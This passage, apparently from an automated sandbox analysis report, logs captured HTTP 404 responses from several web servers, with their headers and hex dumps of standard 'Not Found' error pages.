6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 08:39:17 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, i
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 07 Oct 2024 08:39:21 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 07 Oct 2024 08:39:24 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 07 Oct 2024 08:39:27 GMTConnection: closeContent-Length: 4953Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 07 Oct 2024 08:39:29 GMTConnection: closeContent-Length: 5092Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 07 Oct 2024 08:39:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 07 Oct 2024 08:39:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 32 39 2a ed 08 02 7d 9e 28 32 59 68 9f 6b 98 4c 84 21 71 c7 99 03 3f 00 bb 2e 42 a4 f0 45 41 48 1c 67 a7 90 86 b1 36 50 8c ea 6e 34 ef 8e 70 2d 0a b1 d9 c0 65 3b 74 df 57 f0 b2 e0 60 18 a6 69 12 47 b2 14 4c df 8b c8 3e 10 34 3e 30 dc e6 12 ff 2c 52 d2 25 63 4a 35 77 cb 7e 01 3f 66 28 c3 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e9MAK0`.]B]Bmj2kvoi_cM{_FWzX|Y:T&J:26'U<+$.|gQ29*}(2YhkL!q?.BEAHg6Pn4p-e;tW`iGL>4>0,R%cJ5w~?f(0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 07 Oct 2024 08:39:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 60 a6 2e 5d f0 10 02 ba ed e2 42 5d 8b a6 07 8f d1 cc 92 42 6d 6a 32 6b f5 df 9b 76 11 bc 0c bc 99 6f 1e ef c9 8b f2 69 ab 5f 9b 0a 1e f4 63 0d 4d 7b 5f ef b7 b0 ba 46 dc 57 7a 87 58 ea f2 7c 59 8b 1c b1 3a ac 54 26 1d 7f f4 4a 3a 32 36 09 ee b8 27 55 e4 05 1c 3c c3 ce 9f 06 2b f1 bc cc 24 2e 90 7c f3 f6 67 fe bb 51 ff 98 a4 